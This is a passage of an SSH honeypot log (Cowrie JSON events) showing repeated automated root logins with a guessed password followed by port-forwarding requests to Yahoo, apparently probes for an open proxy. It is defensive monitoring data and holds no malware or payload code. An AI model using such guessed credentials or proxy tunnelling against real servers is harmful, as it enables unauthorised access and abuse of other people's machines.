-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:26.891343Z","src_ip":"213.209.150.239","session":"0afb9ff9ef1b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:27.126869Z","src_ip":"213.209.150.239","session":"0afb9ff9ef1b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":25383,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:25383","sensor":"my-vps","timestamp":"2025-08-26T00:56:27.175990Z","session":"0afb9ff9ef1b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:27.223442Z","src_ip":"213.209.150.239","session":"0afb9ff9ef1b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":906,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:906","sensor":"my-vps","timestamp":"2025-08-26T00:56:27.361641Z","session":"0afb9ff9ef1b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:27.408953Z","src_ip":"213.209.150.239","session":"0afb9ff9ef1b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:27.457021Z","src_ip":"213.209.150.239","session":"0afb9ff9ef1b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56179,"dst_ip":"1.2.3.4","dst_port":22,"session":"a30066d8faed","protocol":"ssh","message":"New connection: 213.209.150.239:56179 (1.2.3.4:22) [session: a30066d8faed]","sensor":"my-vps","timestamp":"2025-08-26T00:56:27.503293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:27.503906Z","src_ip":"213.209.150.239","session":"a30066d8faed"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:27.551161Z","src_ip":"213.209.150.239","session":"a30066d8faed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:27.786613Z","src_ip":"213.209.150.239","session":"a30066d8faed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":16926,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:16926","sensor":"my-vps","timestamp":"2025-08-26T00:56:27.834958Z","session":"a30066d8faed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:27.882269Z","src_ip":"213.209.150.239","session":"a30066d8faed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":17889,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:17889","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.017542Z","session":"a30066d8faed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.064780Z","src_ip":"213.209.150.239","session":"a30066d8faed"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.112963Z","src_ip":"213.209.150.239","session":"a30066d8faed"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56216,"dst_ip":"1.2.3.4","dst_port":22,"session":"525d018aadf3","protocol":"ssh","message":"New connection: 213.209.150.239:56216 (1.2.3.4:22) [session: 525d018aadf3]","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.168554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.170651Z","src_ip":"213.209.150.239","session":"525d018aadf3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.227007Z","src_ip":"213.209.150.239","session":"525d018aadf3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.509233Z","src_ip":"213.209.150.239","session":"525d018aadf3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":32041,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:32041","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.566782Z","session":"525d018aadf3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.623412Z","src_ip":"213.209.150.239","session":"525d018aadf3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":29723,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29723","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.778937Z","session":"525d018aadf3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.835449Z","src_ip":"213.209.150.239","session":"525d018aadf3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.893411Z","src_ip":"213.209.150.239","session":"525d018aadf3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56265,"dst_ip":"1.2.3.4","dst_port":22,"session":"94f5f263790b","protocol":"ssh","message":"New connection: 213.209.150.239:56265 (1.2.3.4:22) [session: 94f5f263790b]","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.948748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:28.949668Z","src_ip":"213.209.150.239","session":"94f5f263790b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:29.006082Z","src_ip":"213.209.150.239","session":"94f5f263790b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:29.287151Z","src_ip":"213.209.150.239","session":"94f5f263790b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":15272,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:15272","sensor":"my-vps","timestamp":"2025-08-26T00:56:29.344509Z","session":"94f5f263790b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:29.400985Z","src_ip":"213.209.150.239","session":"94f5f263790b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":19889,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:19889","sensor":"my-vps","timestamp":"2025-08-26T00:56:29.554802Z","session":"94f5f263790b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:29.611389Z","src_ip":"213.209.150.239","session":"94f5f263790b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:29.668946Z","src_ip":"213.209.150.239","session":"94f5f263790b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56319,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb1a31406c0a","protocol":"ssh","message":"New connection: 213.209.150.239:56319 (1.2.3.4:22) [session: eb1a31406c0a]","sensor":"my-vps","timestamp":"2025-08-26T00:56:29.714921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:29.715686Z","src_ip":"213.209.150.239","session":"eb1a31406c0a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:29.762756Z","src_ip":"213.209.150.239","session":"eb1a31406c0a"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":39978,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f4b19ea12d5","protocol":"ssh","message":"New connection: 36.89.28.139:39978 (1.2.3.4:22) [session: 9f4b19ea12d5]","sensor":"my-vps","timestamp":"2025-08-26T00:56:29.893805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:29.894989Z","src_ip":"36.89.28.139","session":"9f4b19ea12d5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:29.996506Z","src_ip":"213.209.150.239","session":"eb1a31406c0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":32507,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:32507","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.044675Z","session":"eb1a31406c0a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.091798Z","src_ip":"213.209.150.239","session":"eb1a31406c0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":22045,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22045","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.229433Z","session":"eb1a31406c0a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.276570Z","src_ip":"213.209.150.239","session":"eb1a31406c0a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.324280Z","src_ip":"213.209.150.239","session":"eb1a31406c0a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56368,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a3c8e944889","protocol":"ssh","message":"New connection: 213.209.150.239:56368 (1.2.3.4:22) [session: 2a3c8e944889]","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.370221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.371233Z","src_ip":"213.209.150.239","session":"2a3c8e944889"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.418001Z","src_ip":"213.209.150.239","session":"2a3c8e944889"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.651672Z","src_ip":"213.209.150.239","session":"2a3c8e944889"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":5780,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:5780","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.699470Z","session":"2a3c8e944889"}
